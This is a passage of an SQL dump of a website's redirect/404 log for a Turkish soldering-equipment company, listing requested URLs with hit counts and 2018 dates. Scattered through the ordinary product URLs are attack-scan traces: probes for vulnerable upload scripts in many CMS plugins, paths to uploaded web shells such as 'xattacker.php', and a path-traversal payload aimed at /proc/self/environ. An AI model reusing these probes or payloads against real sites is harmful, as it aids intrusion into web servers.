00:00:00',301),(20137,'http://www.3s-technologies.com.tr/en/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php','',4,0,'2018-05-31 09:57:38','0000-00-00 00:00:00',301),(20138,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,product_sku/results,1-40?error=404',NULL,'','',4,0,'2018-05-31 20:31:09','0000-00-00 00:00:00',301),(20139,'http://3s-technologies.com.tr/en/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',NULL,'','',16,0,'2018-06-01 15:42:44','0000-00-00 00:00:00',301),(20140,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/dirdesc/results,1-5',NULL,'','',1,0,'2018-06-01 16:32:08','0000-00-00 00:00:00',301),(20141,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/dirdesc/results,1-5',NULL,'','',1,0,'2018-06-02 03:11:57','0000-00-00 00:00:00',301),(20142,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/results,1-10',NULL,'','',2,0,'2018-06-02 10:43:32','0000-00-00 00:00:00',301),(20143,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/results,1-50',NULL,'','',6,0,'2018-06-02 10:44:00','0000-00-00 00:00:00',301),(20144,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2018-06-02 14:18:58','0000-00-00 00:00:00',301),(20145,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/dirdesc/results,1-20',NULL,'','',2,0,'2018-06-02 15:25:14','0000-00-00 00:00:00',301),(20146,'http://www.3s-technologies.com.tr//components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',30,0,'2018-06-02 22:23:36','0000-00-00 00:00:00',301),(20147,'http://www.3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload/server/php/files/xattacker.php?x=attacker',NULL,'','',30,0,'2018-06-02 22:23:36','0000-00-00 00:00:00',301),(20148,'http://www.3s-technologies.com.tr//com_sexycontactform/fileupload/index.php',NULL,'','',37,0,'2018-06-02 22:23:37','0000-00-00 00:00:00',301),(20149,'http://www.3s-technologies.com.tr/tr/com_sexycontactform/fileupload/files/xattacker.php?x=attacker',NULL,'','',30,0,'2018-06-02 22:23:37','0000-00-00 00:00:00',301),(20150,'http://www.3s-technologies.com.tr//administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',29,0,'2018-06-02 22:23:38','0000-00-00 00:00:00',301),(20151,'http://www.3s-technologies.com.tr/tr/images/stories/xattacker.php.xxxjpg?x=attacker',NULL,'','',44,0,'2018-06-02 22:23:38','0000-00-00 00:00:00',301),(20152,'http://www.3s-technologies.com.tr//administrator/components/com_extplorer/uploadhandler.php',NULL,'','',29,0,'2018-06-02 22:23:38','0000-00-00 00:00:00',301),(20153,'http://www.3s-technologies.com.tr/tr/jwallpapers_files/plupload/xattacker.php?x=attacker',NULL,'','',30,0,'2018-06-02 22:23:38','0000-00-00 00:00:00',301),(20154,'http://www.3s-technologies.com.tr//components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',29,0,'2018-06-02 22:23:39','0000-00-00 00:00:00',301),(20155,'http://www.3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/xattacker.php?x=attacker',NULL,'','',22,0,'2018-06-02 22:23:39','0000-00-00 00:00:00',301),(20156,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc/results,1-5?language=en-gb',NULL,'','',3,0,'2018-06-03 19:35:58','0000-00-00 00:00:00',301),(20157,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2018-06-03 20:21:42','0000-00-00 00:00:00',301),(20158,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc/results,1-10?language=en-gb',NULL,'','',3,0,'2018-06-03 22:03:17','0000-00-00 00:00:00',301),(20159,'http://3s-technologies.com.tr/tr/wp-content/plugins/pitchprint/uploader/',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/pitchprint/uploader/','',1,0,'2018-06-04 08:13:25','0000-00-00 00:00:00',301),(20160,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/results,1-10?language=en-gb',NULL,'','',1,0,'2018-06-04 13:12:10','0000-00-00 00:00:00',301),(20161,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,product_sku/results,1-10',NULL,'','',1,0,'2018-06-04 14:58:29','0000-00-00 00:00:00',301),(20162,'http://3s-technologies.com.tr/wp-checking.php',NULL,'3s-technologies.com.tr','',4,0,'2018-06-05 02:23:18','0000-00-00 00:00:00',301),(20163,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,mf_name/results,1-10?language=en-gb',NULL,'','',1,0,'2018-06-05 09:22:09','0000-00-00 00:00:00',301),(20164,'http://www.3s-technologies.com.tr/en/contacts&amp;sa=u&amp;ved=0ahukewjpgtdsprzbahwl6ymkhw6kbfs4zbawckobmb8&amp;usg=aovvaw1u8ryx9_oiymw5m2jth4er/?nav=../../../../../../../../../../../../..//proc/self/environ\000',NULL,'','',1,0,'2018-06-05 10:26:31','0000-00-00 00:00:00',301),(20165,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,mf_name/results,1-10',NULL,'','',5,0,'2018-06-05 14:15:43','0000-00-00 00:00:00',301),(20166,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/rh6-detail',NULL,'','',17,0,'2018-06-05 14:16:55','0000-00-00 00:00:00',301),(20167,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,ordering/results,1-10',NULL,'','',5,0,'2018-06-05 14:17:41','0000-00-00 00:00:00',301),(20168,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name',NULL,'','',17,0,'2018-06-05 15:58:55','0000-00-00 00:00:00',301),(20169,'http://3s-technologies.com.tr/tr/administrator/components/com_facileforms/libraries/jquery/tooltip.js',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_facileforms/libraries/jquery/tooltip.js','',11,0,'2018-06-06 05:09:20','0000-00-00 00:00:00',301),(20170,'http://3s-technologies.com.tr/en/components/com_facileforms/libraries/jquery/tooltip.js',NULL,'http://3s-technologies.com.tr/components/com_facileforms/libraries/jquery/tooltip.js','',8,0,'2018-06-06 08:28:50','0000-00-00 00:00:00',301),(20171,'http://www.3s-technologies.com.tr/tr/contactus',NULL,'','',5,0,'2018-06-06 21:00:42','0000-00-00 00:00:00',301),(20172,'http://www.3s-technologies.com.tr/tr/contact-us',NULL,'','',21,0,'2018-06-06 21:00:43','0000-00-00 00:00:00',301),(20173,'http://www.3s-technologies.com.tr/tr/kontakt',NULL,'','',2,0,'2018-06-06 21:00:43','0000-00-00 00:00:00',301),(20174,'http://www.3s-technologies.com.tr/tr/contactar',NULL,'','',2,0,'2018-06-06 21:00:44','0000-00-00 00:00:00',301),(20175,'http://www.3s-technologies.com.tr/tr/contatti',NULL,'','',2,0,'2018-06-06 21:00:45','0000-00-00 00:00:00',301),(20176,'http://www.3s-technologies.com.tr/tr/contato',NULL,'','',2,0,'2018-06-06 21:00:46','0000-00-00 00:00:00',301),(20177,'http://www.3s-technologies.com.tr/tr/contacts',NULL,'','',4,0,'2018-06-06 21:00:46','0000-00-00 00:00:00',301),(20178,'http://www.3s-technologies.com.tr/tr/contactos',NULL,'','',2,0,'2018-06-06 21:00:47','0000-00-00 00:00:00',301),(20179,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/tooltip.js',NULL,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/tooltip.js','',14,0,'2018-06-07 10:35:04','0000-00-00 00:00:00',301),(20180,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/css.php',NULL,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/css.php','',2,0,'2018-06-08 04:17:05','0000-00-00 00:00:00',301),(20181,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/xxx.php',NULL,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/xxx.php','',2,0,'2018-06-08 04:17:05','0000-00-00 00:00:00',301),(20182,'http://3s-technologies.com.tr/en/components/com_facileforms/libraries/jquery/css.php',NULL,'http://3s-technologies.com.tr/components/com_facileforms/libraries/jquery/css.php','',1,0,'2018-06-08 07:18:08','0000-00-00 00:00:00',301),(20183,'http://3s-technologies.com.tr/en/components/com_facileforms/libraries/jquery/xxx.php',NULL,'http://3s-technologies.com.tr/components/com_facileforms/libraries/jquery/xxx.php','',2,0,'2018-06-08 07:18:14','0000-00-00 00:00:00',301),(20184,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_sku/results,1-20',NULL,'','',4,0,'2018-06-08 15:13:55','0000-00-00 00:00:00',301),(20185,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,category_name/dirdesc/results,6-10?language=en-gb',NULL,'','',4,0,'2018-06-08 20:12:33','0000-00-00 00:00:00',301),(20186,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/results,6-25?language=en-gb',NULL,'','',4,0,'2018-06-08 21:01:00','0000-00-00 00:00:00',301),(20187,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,mf_name/results,1-50?language=en-gb',NULL,'','',3,0,'2018-06-08 22:11:47','0000-00-00 00:00:00',301),(20188,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku/results,1-5?language=en-gb',NULL,'','',3,0,'2018-06-08 22:13:23','0000-00-00 00:00:00',301),(20189,'http://3s-technologies.com.tr/tr/sitemap.xml',NULL,'','',84,0,'2018-06-09 12:14:50','0000-00-00 00:00:00',301),(20190,'http://3s-technologies.com.tr/tr/forum/main-forum',NULL,'http://3s-technologies.com.tr/tr/forum/main-forum','',1,0,'2018-06-09 20:18:35','0000-00-00 00:00:00',301),(20191,'http://3s-technologies.com.tr/tr/admin/images/cal_date_over.gif',NULL,'','',52,0,'2018-06-09 22:55:19','0000-00-00 00:00:00',301),(20192,'http://3s-technologies.com.tr/tr/admin/login.php',NULL,'','',61,0,'2018-06-09 22:55:20','0000-00-00 00:00:00',301),(20193,'http://3s-technologies.com.tr/tr/images/vuln2.php',NULL,'','',40,0,'2018-06-09 22:55:35','0000-00-00 00:00:00',301),(20194,'http://3s-technologies.com.tr/tr/tmp/vuln2.php',NULL,'','',44,0,'2018-06-09 22:55:37','0000-00-00 00:00:00',301),(20195,'http://3s-technologies.com.tr/tr/tmp/vuln.php',NULL,'','',99,0,'2018-06-09 22:55:41','0000-00-00 00:00:00',301),(20196,'http://3s-technologies.com.tr/tr/administrator/components/com_alberghi/upload.alberghi.php',NULL,'','',47,0,'2018-06-09 22:55:50','0000-00-00 00:00:00',301),(20197,'http://3s-technologies.com.tr/tr/media/vuln.txt',NULL,'','',38,0,'2018-06-09 22:55:54','0000-00-00 00:00:00',301),(20198,'http://3s-technologies.com.tr/tr/images/pwn.gif',NULL,'','',9,0,'2018-06-09 22:56:11','0000-00-00 00:00:00',301),(20199,'http://www.3s-technologies.com.tr/en/wp-content/themes/brainstorm/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/brainstorm/style.css','',4,0,'2018-06-10 05:08:30','0000-00-00 00:00:00',301),(20200,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/b3.php',NULL,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/b3.php','',2,0,'2018-06-11 04:09:17','0000-00-00 00:00:00',301),(20201,'http://3s-technologies.com.tr/tr/include.php',NULL,'http://3s-technologies.com.tr/tr/include.php','',15,0,'2018-06-11 04:09:22','0000-00-00 00:00:00',301),(20202,'http://www.3s-technologies.com.tr//modules/columnadverts/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:33:18','0000-00-00 00:00:00',301),(20203,'http://www.3s-technologies.com.tr/tr/modules/columnadverts/slides/error.php',NULL,'','',1,0,'2018-06-11 04:33:29','0000-00-00 00:00:00',301),(20204,'http://www.3s-technologies.com.tr//modules/vtemslideshow/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:33:40','0000-00-00 00:00:00',301),(20205,'http://www.3s-technologies.com.tr/tr/modules/vtemslideshow/slides/error.php',NULL,'','',1,0,'2018-06-11 04:33:49','0000-00-00 00:00:00',301),(20206,'http://www.3s-technologies.com.tr//modules/realty/include/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:34:00','0000-00-00 00:00:00',301),(20207,'http://www.3s-technologies.com.tr/tr/modules/realty/include/slides/error.php',NULL,'','',1,0,'2018-06-11 04:34:09','0000-00-00 00:00:00',301),(20208,'http://www.3s-technologies.com.tr//modules/realty/evogallery/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:34:19','0000-00-00 00:00:00',301),(20209,'http://www.3s-technologies.com.tr/tr/modules/realty/evogallery/slides/error.php',NULL,'','',1,0,'2018-06-11 04:34:27','0000-00-00 00:00:00',301),(20210,'http://www.3s-technologies.com.tr//modules/realty/evogallery2/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:34:37','0000-00-00 00:00:00',301),(20211,'http://www.3s-technologies.com.tr/tr/modules/realty/evogallery2/slides/error.php',NULL,'','',1,0,'2018-06-11 04:34:46','0000-00-00 00:00:00',301),(20212,'http://www.3s-technologies.com.tr//modules/resaleform/upload.php',NULL,'','',1,0,'2018-06-11 04:34:55','0000-00-00 00:00:00',301),(20213,'http://www.3s-technologies.com.tr/tr/modules/filesupload/error.php',NULL,'','',1,0,'2018-06-11 04:35:04','0000-00-00 00:00:00',301),(20214,'http://www.3s-technologies.com.tr//modules/megaproduct/',NULL,'','',1,0,'2018-06-11 04:35:12','0000-00-00 00:00:00',301),(20215,'http://www.3s-technologies.com.tr/tr/modules/megaproduct/error.php',NULL,'','',1,0,'2018-06-11 04:35:21','0000-00-00 00:00:00',301),(20216,'http://www.3s-technologies.com.tr//modules/soopamobile/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:35:30','0000-00-00 00:00:00',301),(20217,'http://www.3s-technologies.com.tr/tr/modules/soopamobile/slides/error.php',NULL,'','',1,0,'2018-06-11 04:35:39','0000-00-00 00:00:00',301),(20218,'http://www.3s-technologies.com.tr//modules/soopamobile2/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:35:48','0000-00-00 00:00:00',301),(20219,'http://www.3s-technologies.com.tr/tr/modules/soopamobile2/slides/error.php',NULL,'','',2,0,'2018-06-11 04:35:56','0000-00-00 00:00:00',301),(20220,'http://www.3s-technologies.com.tr//modules/soopamobile2/uploadproduct.php',NULL,'','',1,0,'2018-06-11 04:36:06','0000-00-00 00:00:00',301),(20221,'http://www.3s-technologies.com.tr//modules/soopabanners/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:36:25','0000-00-00 00:00:00',301),(20222,'http://www.3s-technologies.com.tr/tr/modules/soopabanners/slides/error.php',NULL,'','',1,0,'2018-06-11 04:36:34','0000-00-00 00:00:00',301),(20223,'http://www.3s-technologies.com.tr//modules/vtermslideshow/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:36:42','0000-00-00 00:00:00',301),(20224,'http://www.3s-technologies.com.tr/tr/modules/vtermslideshow/slides/error.php',NULL,'','',1,0,'2018-06-11 04:36:53','0000-00-00 00:00:00',301),(20225,'http://www.3s-technologies.com.tr//modules/simpleslideshow/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:37:02','0000-00-00 00:00:00',301),(20226,'http://www.3s-technologies.com.tr/tr/modules/simpleslideshow/slides/error.php',NULL,'','',1,0,'2018-06-11 04:37:13','0000-00-00 00:00:00',301),(20227,'http://www.3s-technologies.com.tr//modules/productpageadverts/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:37:22','0000-00-00 00:00:00',301),(20228,'http://www.3s-technologies.com.tr/tr/modules/productpageadverts/slides/error.php',NULL,'','',1,0,'2018-06-11 04:37:30','0000-00-00 00:00:00',301),(20229,'http://www.3s-technologies.com.tr//modules/homepageadvertise/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:37:39','0000-00-00 00:00:00',301),(20230,'http://www.3s-technologies.com.tr/tr/modules/homepageadvertise/slides/error.php',NULL,'','',1,0,'2018-06-11 04:37:49','0000-00-00 00:00:00',301),(20231,'http://www.3s-technologies.com.tr//modules/homepageadvertise2/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:37:57','0000-00-00 00:00:00',301),(20232,'http://www.3s-technologies.com.tr/tr/modules/homepageadvertise2/slides/error.php',NULL,'','',1,0,'2018-06-11 04:38:06','0000-00-00 00:00:00',301),(20233,'http://www.3s-technologies.com.tr//modules/columnadverts2/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:38:17','0000-00-00 00:00:00',301),(20234,'http://www.3s-technologies.com.tr/tr/modules/columnadverts2/slides/error.php',NULL,'','',1,0,'2018-06-11 04:38:25','0000-00-00 00:00:00',301),(20235,'http://www.3s-technologies.com.tr//modules/filesupload/upload.php',NULL,'','',1,0,'2018-06-11 04:38:33','0000-00-00 00:00:00',301),(20236,'http://www.3s-technologies.com.tr/tr/modules/filesupload/uploads/error.php',NULL,'','',1,0,'2018-06-11 04:38:42','0000-00-00 00:00:00',301),(20237,'http://www.3s-technologies.com.tr//modules/jro_homepageadvertise/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:38:51','0000-00-00 00:00:00',301),(20238,'http://www.3s-technologies.com.tr/tr/modules/jro_homepageadvertise/slides/error.php',NULL,'','',1,0,'2018-06-11 04:39:00','0000-00-00 00:00:00',301),(20239,'http://www.3s-technologies.com.tr//modules/jro_homepageadvertise2/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:39:08','0000-00-00 00:00:00',301),(20240,'http://www.3s-technologies.com.tr/tr/modules/jro_homepageadvertise2/slides/error.php',NULL,'','',1,0,'2018-06-11 04:39:17','0000-00-00 00:00:00',301),(20241,'http://www.3s-technologies.com.tr//modules/leosliderlayer/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:39:26','0000-00-00 00:00:00',301),(20242,'http://www.3s-technologies.com.tr/tr/modules/leosliderlayer/slides/error.php',NULL,'','',2,0,'2018-06-11 04:39:35','0000-00-00 00:00:00',301),(20243,'http://www.3s-technologies.com.tr//modules/leosliderlayer/upload_images.php',NULL,'','',1,0,'2018-06-11 04:39:44','0000-00-00 00:00:00',301),(20244,'http://www.3s-technologies.com.tr//modules/vtemskitter/uploadimage.php',NULL,'','',1,0,'2018-06-11 04:40:04','0000-00-00 00:00:00',301),(20245,'http://www.3s-technologies.com.tr/tr/modules/vtemskitter/img/error.php',NULL,'','',1,0,'2018-06-11 04:40:12','0000-00-00 00:00:00',301),(20246,'http://www.3s-technologies.com.tr//modules/additionalproductstabs/file_upload.php',NULL,'','',1,0,'2018-06-11 04:40:22','0000-00-00 00:00:00',301),(20247,'http://www.3s-technologies.com.tr/tr/modules/additionalproductstabs/file_uploads/error.php',NULL,'','',1,0,'2018-06-11 04:40:33','0000-00-00 00:00:00',301),(20248,'http://www.3s-technologies.com.tr//modules/addthisplugin/file_upload.php',NULL,'','',1,0,'2018-06-11 04:40:44','0000-00-00 00:00:00',301),(20249,'http://www.3s-technologies.com.tr/tr/modules/addthisplugin/file_uploads/error.php',NULL,'','',1,0,'2018-06-11 04:40:53','0000-00-00 00:00:00',301),(20250,'http://www.3s-technologies.com.tr//modules/attributewizardpro/file_upload.php',NULL,'','',1,0,'2018-06-11 04:41:02','0000-00-00 00:00:00',301),(20251,'http://www.3s-technologies.com.tr/tr/modules/attributewizardpro/file_uploads/error.php',NULL,'','',1,0,'2018-06-11 04:41:10','0000-00-00 00:00:00',301),(20252,'http://www.3s-technologies.com.tr//modules/attributewizardpro.old/file_upload.php',NULL,'','',1,0,'2018-06-11 04:41:19','0000-00-00 00:00:00',301),(20253,'http://www.3s-technologies.com.tr/tr/modules/attributewizardpro.old/file_uploads/error.php',NULL,'','',1,0,'2018-06-11 04:41:28','0000-00-00 00:00:00',301),(20254,'http://www.3s-technologies.com.tr//modules/1attributewizardpro/file_upload.php',NULL,'','',1,0,'2018-06-11 04:41:38','0000-00-00 00:00:00',301),(20255,'http://www.3s-technologies.com.tr/tr/modules/1attributewizardpro/file_uploads/error.php',NULL,'','',1,0,'2018-06-11 04:41:48','0000-00-00 00:00:00',301),(20256,'http://www.3s-technologies.com.tr//modules/attributewizardpro_x/file_upload.php',NULL,'','',1,0,'2018-06-11 04:41:58','0000-00-00 00:00:00',301),(20257,'http://www.3s-technologies.com.tr/tr/modules/attributewizardpro_x/file_uploads/error.php',NULL,'','',1,0,'2018-06-11 04:42:07','0000-00-00 00:00:00',301),(20258,'http://www.3s-technologies.com.tr//modules/advancedslider/ajax_advancedsliderupload.php?action=submituploadimage&id_slide=php',NULL,'','',1,0,'2018-06-11 04:42:17','0000-00-00 00:00:00',301),(20259,'http://www.3s-technologies.com.tr/tr/modules/advancedslider/uploads/error.php',NULL,'','',1,0,'2018-06-11 04:42:26','0000-00-00 00:00:00',301),(20260,'http://www.3s-technologies.com.tr//modules/cartabandonmentpro/upload.php',NULL,'','',1,0,'2018-06-11 04:42:37','0000-00-00 00:00:00',301),(20261,'http://www.3s-technologies.com.tr/tr/modules/cartabandonmentpro/uploads/error.php',NULL,'','',1,0,'2018-06-11 04:42:47','0000-00-00 00:00:00',301),(20262,'http://www.3s-technologies.com.tr//modules/cartabandonmentproold/upload.php',NULL,'','',1,0,'2018-06-11 04:42:56','0000-00-00 00:00:00',301),(20263,'http://www.3s-technologies.com.tr/tr/modules/cartabandonmentproold/uploads/error.php',NULL,'','',1,0,'2018-06-11 04:43:06','0000-00-00 00:00:00',301),(20264,'http://www.3s-technologies.com.tr//modules/videostab/ajax_videostab.php?action=submituploadvideo&id_product=upload',NULL,'','',1,0,'2018-06-11 04:43:15','0000-00-00 00:00:00',301),(20265,'http://www.3s-technologies.com.tr/tr/modules/videostab/uploads/error.php',NULL,'','',1,0,'2018-06-11 04:43:27','0000-00-00 00:00:00',301),(20266,'http://www.3s-technologies.com.tr//modules/fieldvmegamenu/ajax/upload.php',NULL,'','',1,0,'2018-06-11 04:43:37','0000-00-00 00:00:00',301),(20267,'http://www.3s-technologies.com.tr/tr/modules/fieldvmegamenu/uploads/error.php',NULL,'','',1,0,'2018-06-11 04:43:46','0000-00-00 00:00:00',301),(20268,'http://www.3s-technologies.com.tr//modules/orderfiles/ajax/upload.php',NULL,'','',1,0,'2018-06-11 04:43:56','0000-00-00 00:00:00',301),(20269,'http://www.3s-technologies.com.tr/tr/modules/orderfiles/files/error.php',NULL,'','',1,0,'2018-06-11 04:44:05','0000-00-00 00:00:00',301),(20270,'http://www.3s-technologies.com.tr//modules/pk_flexmenu/ajax/upload.php',NULL,'','',1,0,'2018-06-11 04:44:14','0000-00-00 00:00:00',301),(20271,'http://www.3s-technologies.com.tr/tr/modules/pk_flexmenu/uploads/error.php',NULL,'','',1,0,'2018-06-11 04:44:23','0000-00-00 00:00:00',301),(20272,'http://www.3s-technologies.com.tr//modules/pk_flexmenu_old/ajax/upload.php',NULL,'','',1,0,'2018-06-11 04:44:32','0000-00-00 00:00:00',301),(20273,'http://www.3s-technologies.com.tr/tr/modules/pk_flexmenu_old/uploads/error.php',NULL,'','',1,0,'2018-06-11 04:44:42','0000-00-00 00:00:00',301),(20274,'http://www.3s-technologies.com.tr//modules/pk_vertflexmenu/ajax/upload.php',NULL,'','',1,0,'2018-06-11 04:44:51','0000-00-00 00:00:00',301),(20275,'http://www.3s-technologies.com.tr/tr/modules/pk_vertflexmenu/uploads/error.php',NULL,'','',1,0,'2018-06-11 04:45:00','0000-00-00 00:00:00',301),(20276,'http://www.3s-technologies.com.tr//modules/nvn_export_orders/upload.php',NULL,'','',1,0,'2018-06-11 04:45:10','0000-00-00 00:00:00',301),(20277,'http://www.3s-technologies.com.tr/tr/modules/nvn_export_orders/error.php',NULL,'','',1,0,'2018-06-11 04:45:21','0000-00-00 00:00:00',301),(20278,'http://www.3s-technologies.com.tr//modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelajax.php',NULL,'','',1,0,'2018-06-11 04:45:30','0000-00-00 00:00:00',301),(20279,'http://www.3s-technologies.com.tr/tr/modules/tdpsthemeoptionpanel/upload/error.php',NULL,'','',1,0,'2018-06-11 04:45:41','0000-00-00 00:00:00',301),(20280,'http://www.3s-technologies.com.tr//modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php',NULL,'','',1,0,'2018-06-11 04:45:51','0000-00-00 00:00:00',301),(20281,'http://www.3s-technologies.com.tr/tr/modules/psmodthemeoptionpanel/upload/error.php',NULL,'','',1,0,'2018-06-11 04:46:02','0000-00-00 00:00:00',301),(20282,'http://www.3s-technologies.com.tr//modules/lib/redactor/file_upload.php',NULL,'','',1,0,'2018-06-11 04:46:13','0000-00-00 00:00:00',301),(20283,'http://www.3s-technologies.com.tr/tr/masseditproduct/uploads/file/error.php',NULL,'','',1,0,'2018-06-11 04:46:22','0000-00-00 00:00:00',301),(20284,'http://www.3s-technologies.com.tr//modules/blocktestimonial/addtestimonial.php',NULL,'','',1,0,'2018-06-11 04:46:31','0000-00-00 00:00:00',301),(20285,'http://www.3s-technologies.com.tr/tr/upload/error.php',NULL,'','',1,0,'2018-06-11 04:46:41','0000-00-00 00:00:00',301),(20286,'http://3s-technologies.com.tr/en/components/com_facileforms/libraries/jquery/b3.php',NULL,'http://3s-technologies.com.tr/components/com_facileforms/libraries/jquery/b3.php','',2,0,'2018-06-11 07:04:39','0000-00-00 00:00:00',301),(20287,'http://3s-technologies.com.tr/en/include.php',NULL,'http://3s-technologies.com.tr/include.php','',2,0,'2018-06-11 07:04:40','0000-00-00 00:00:00',301),(20288,'http://3s-technologies.com.tr/en/footer.php',NULL,'http://3s-technologies.com.tr/footer.php','',5,0,'2018-06-11 07:04:43','0000-00-00 00:00:00',301),(20289,'http://3s-technologies.com.tr/tr/wp-content/themes/highlight/lib/utils/upload-handler.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/themes/highlight/lib/utils/upload-handler.php','',1,0,'2018-06-11 07:17:46','0000-00-00 00:00:00',301),(20290,'http://3s-technologies.com.tr/en/wp-content/themes/highlight/lib/utils/upload-handler.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/highlight/lib/utils/upload-handler.php','',1,0,'2018-06-11 09:57:30','0000-00-00 00:00:00',301),(20291,'http://3s-technologies.com.tr/tr/up.php',NULL,'','',246,0,'2018-06-12 23:10:01','0000-00-00 00:00:00',301),(20292,'http://3s-technologies.com.tr/tr/kickstart.php',NULL,'http://3s-technologies.com.tr/tr/','',37,0,'2018-06-13 12:43:13','0000-00-00 00:00:00',301),(20293,'http://www.3s-technologies.com.tr/en/apple-touch-icon-120x120-precomposed.png',NULL,'','',1,0,'2018-06-14 22:37:14','0000-00-00 00:00:00',301),(20294,'http://www.3s-technologies.com.tr/en/apple-touch-icon-120x120.png',NULL,'','',1,0,'2018-06-14 22:37:14','0000-00-00 00:00:00',301),(20295,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc/results,1-5?language=en-gb',NULL,'','',6,0,'2018-06-15 12:03:14','0000-00-00 00:00:00',301),(20296,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/dirdesc/results,1-5?language=en-gb',NULL,'','',2,0,'2018-06-16 04:20:43','0000-00-00 00:00:00',301),(20297,'http://3s-technologies.com.tr/en/wp-login.php/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2018-06-16 04:32:45','0000-00-00 00:00:00',301),(20298,'http://3s-technologies.com.tr/en/wp-login.php/xmlrpc.php?rsd',NULL,'','',1,0,'2018-06-16 04:32:46','0000-00-00 00:00:00',301),(20299,'http://3s-technologies.com.tr/en/wp-login.php/blog/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2018-06-16 04:32:46','0000-00-00 00:00:00',301),(20300,'http://3s-technologies.com.tr/en/wp-login.php/wordpress/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2018-06-16 04:32:46','0000-00-00 00:00:00',301),(20301,'http://3s-technologies.com.tr/en/wp-login.php/wp/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2018-06-16 04:32:46','0000-00-00 00:00:00',301),(20302,'http://3s-technologies.com.tr/en/wp-login.php/site/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2018-06-16 04:32:46','0000-00-00 00:00:00',301),(20303,'http://3s-technologies.com.tr/en/wp-login.php/cms/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2018-06-16 04:32:47','0000-00-00 00:00:00',301),(20304,'http://3s-technologies.com.tr/tr/index.php/admin',NULL,'','',1,0,'2018-06-17 11:14:18','0000-00-00 00:00:00',301),(20305,'http://3s-technologies.com.tr/downloader/',NULL,'','',1,0,'2018-06-17 11:14:19','0000-00-00 